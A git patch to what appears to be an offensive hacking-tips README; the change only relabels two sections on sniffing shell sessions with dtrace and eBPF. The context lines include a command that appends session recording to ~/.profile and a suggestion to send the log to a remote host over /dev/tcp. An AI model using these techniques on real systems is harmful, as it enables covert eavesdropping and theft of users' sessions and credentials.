From 4996d26fa389c256441c7625498acf111fd54d30 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Thu, 23 Nov 2023 17:08:28 +0000
Subject: [PATCH] Update README.md
---
README.md | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/README.md b/README.md
index 2950f6d..74086df 100644
--- a/README.md
+++ b/README.md
@@ -1724,7 +1724,7 @@ echo 'exec script -qc /bin/bash ~/.ssh-log.txt' >>~/.profile
Consider using [zap-args](#bash-hide-arguments) to hide the the arguments and /dev/tcp/3.13.3.7/1524 as an output file to log to a remote host.
-**9.ii Sniff all SHELL sessions with dtrace**
+**9.ii Sniff all SHELL sessions with dtrace - FreeBSD**
Especially useful for Solaris/SunOS and FreeBSD (pfSense). It uses kernel probes to trace *all* sshd processes.
@@ -1744,7 +1744,7 @@ Start a dtrace and log to /tmp/.log:
```
-**9.iii Sniff all SHELL sessions with eBPF**
+**9.iii Sniff all SHELL sessions with eBPF - Linux**
eBPF allows us to *safely* hook over 120,000 functions in the kernel. It's like a better "dtrace" but for Linux.